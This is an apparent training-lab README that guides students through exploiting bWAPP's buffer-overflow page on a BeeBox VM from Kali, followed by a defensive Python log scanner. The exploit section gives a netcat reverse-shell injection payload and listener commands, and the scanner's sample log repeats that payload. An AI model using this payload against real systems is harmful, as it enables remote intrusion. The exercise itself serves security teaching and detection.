Xafiq/buffer-overflow-exploit
Buffer overflow exploit

By @rosinni and other contributors at 4Geeks Academy

These instructions are available in English.

🌱 How to Start This Project?

This exercise teaches you how to identify and exploit buffer overflow vulnerabilities. Through this project, you will understand how buffer overflows can be used to execute arbitrary code, and you will apply exploitation techniques to compromise the security of the application.

Requirements

  • Kali Machine (attacker)
  • BeeBox Machine

📝 Instructions

  1. Verify that both Kali Linux and BeeBox are connected to the same network. You can do this by checking the IP addresses assigned to each machine and ensuring they can communicate with each other.

  2. Check connectivity. From Kali, try pinging BeeBox and vice versa to confirm that the network connection is working.

    ping [IP-OF-BEEBOX]
    ping [IP-OF-KALI]
  3. Log in to the BeeBox machine.

  4. Find the hash related to the vulnerability (this could be part of the configuration or code).

Verify Buffer Overflow Vulnerability

  1. Enter a movie name that is in the bWAPP database (e.g., Hulk, Iron Man).

  2. Then enter a movie name that is not in the database (e.g., Harry Potter).

  3. Run the following command to view the contents of the bof_1.php file:

    cat /var/www/bWAPP/bof_1.php

    The goal is to understand how the movie title input is handled and how it is passed as a command-line argument to the application. Look for signs of buffer overflow.

Generate and Use the Exploit String

  1. Generate the exploit string by running the following command on Kali to create a string that will help identify the buffer overflow:

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 360
  2. Save the generated string in a file named pattern_chain.txt:

    echo "Aa0Aa1Aa2Aa3Aa4Aa5..." > pattern_chain.txt
  3. Start an HTTP server on Kali to transfer the file:

    python3 -m http.server 8080
  4. Download the pattern_chain.txt file on BeeBox using wget:

    wget http://[IP-OF-KALI]:8080/pattern_chain.txt
  5. Read the content of the downloaded file on BeeBox:

    cat pattern_chain.txt

Inject the Exploit String and Payload

  1. Use the string generated with pattern_create.rb in the field or parameter that may cause the buffer overflow in bWAPP.


The goal is to see how the application responds to input that exceeds the expected size.

  2. Run a listener on Kali to receive the remote shell:

    nc -lvnp 4444
  3. To obtain a remote shell, inject the following payload into the field that causes the overflow:

    $(nc -e /bin/bash [IP-OF-KALI] 4444)

Replace [IP-OF-KALI] with the IP address of your Kali machine.

  4. Confirm the connection on Kali. If the exploit is successful, you should see a connection in the Kali listener and receive a Bash prompt.

Check Server Logs

  1. Review the web server logs on BeeBox for any messages related to the buffer overflow:

    sudo cat /var/log/apache2/error.log
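As an added example that is not part of the original exercise, the following Python scanner complements the error-log check above by walking Apache access-log lines and flagging the three kinds of input this exercise sends to bof_1.php: an oversized title, a pattern_create.rb-style cyclic string, and shell metacharacters such as `$(`. The sample log lines, the IP addresses in them and the 64-byte title ceiling are constructed assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache access-log lines (common log format); not real BeeBox
# output, and the addresses are made up. Line 1 is a normal lookup, line 2
# carries a pattern_create.rb-style cyclic string, line 3 a URL-encoded
# command substitution of the shape used in the exercise.
SAMPLE_LOG = [
    '192.168.56.101 - - [10/May/2024:12:00:01 +0000] '
    '"GET /bWAPP/bof_1.php?title=Hulk&action=search HTTP/1.1" 200 1523',
    '192.168.56.101 - - [10/May/2024:12:00:02 +0000] '
    '"GET /bWAPP/bof_1.php?title=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9'
    'Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2&action=search HTTP/1.1" 200 1523',
    '192.168.56.101 - - [10/May/2024:12:00:03 +0000] '
    '"GET /bWAPP/bof_1.php?title=%24%28nc+-e+%2Fbin%2Fbash+192.168.56.102+4444%29'
    '&action=search HTTP/1.1" 200 1523',
]

# Request line inside the quoted part of a log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# pattern_create.rb emits repeating Upper-lower-digit triplets (Aa0Aa1Aa2...).
CYCLIC_RE = re.compile(r'(?:[A-Z][a-z][0-9]){4,}')
# Metacharacters that make a shell treat a "title" as a command.
SHELL_META_RE = re.compile(r'\$\(|`|;|\|')
MAX_TITLE_LEN = 64  # assumed ceiling for a legitimate movie title


def analyse_line(line: str) -> list[str]:
    """Return human-readable findings for one log line (empty if benign)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    # parse_qs percent-decodes values, so %24%28 becomes "$(" here.
    params = parse_qs(urlparse(match.group("target")).query)
    findings: list[str] = []
    for value in params.get("title", []):
        if len(value) > MAX_TITLE_LEN:
            findings.append(f"oversized title ({len(value)} bytes)")
        if CYCLIC_RE.search(value):
            findings.append("cyclic pattern (pattern_create-style)")
        if SHELL_META_RE.search(value):
            findings.append("shell metacharacters")
    return findings


def scan(lines: list[str]) -> dict[int, list[str]]:
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := analyse_line(line))}
```

Running `scan(SAMPLE_LOG)` reports lines 2 and 3 only; the Hulk lookup on line 1 produces no findings.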
